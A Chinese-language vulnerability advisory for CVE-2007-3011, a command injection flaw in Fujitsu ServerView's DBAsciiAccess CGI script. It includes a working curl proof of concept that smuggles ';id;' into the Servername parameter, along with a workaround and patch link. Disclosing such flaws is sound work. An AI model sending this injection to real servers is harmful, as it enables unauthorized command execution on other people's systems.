发布日期：2007-07-04
更新日期：2007-07-05

受影响系统：

Fujitsu ServerView < 4.50.09

不受影响系统：

Fujitsu ServerView 4.50.09

描述：

---

BUGTRAQ  ID: 24762
CVE(CAN) ID: CVE-2007-3011

ServerView是用于进行自动分析和版本维护的资产管理工具。

ServerView的Web接口处理用户数据时存在输入验证漏洞，远程攻击者可能利用此漏洞在服务器上以Web进程的权限执行任意命令。

DBAsciiAccess CGI脚本提供了ping功能，该脚本Parameterlist参数的Servername子参数给出了所要ping的IP地址，但没有对这个IP地址执行任何检查。如果在IP后添加了拖尾分号，攻击者就可以注入任意shell命令并以Web服务器进程的权限执行。

<*来源：RedTeam Pentesting GmbH （http://www.redteam-pentesting.de/）
  
  链接：http://marc.info/?l=bugtraq&m=118356521617222&w=2
        http://secunia.com/advisories/25944/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

curl
"http://www.example.com/cgi-bin/ServerView/
       SnmpView/DBAsciiAccess
       ?SSL=
       &Application=ServerView/SnmpView
       &Submit=Submit
       &UserID=1
       &Profile=
       &DBAccess=ASCII
       &Viewing=-1
       &Action=Show
       &ThisApplication=TestConnectivityFrame
       &DBElement=ServerName
       &DBValue=bcmes
       &DBList=snism
       &UserValue=
       &DBTableList=SERVER_LIST
       &Sorting=
       &ParameterList=What--primary,,
                      OtherCommunity--public,,
                      SecondIP--,,
                      Timeout--5,,
                      Community--public,,
                      ServerName--bcmes,,
                      Servername--127.0.0.1;id;,,       # vulnerable parameter
                      SType--Server"

建议：

---

临时解决方法：

* 禁止不可信任用户访问ServerView的Web接口。

厂商补丁：

Fujitsu
-------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://support.fujitsu-siemens.com/Download/ShowDescription.asp?SoftwareGUID=D1ED76B7-FB37-4375-8744-8E6D5CFDC87F

浏览次数：2404
严重程度：0（网友投票）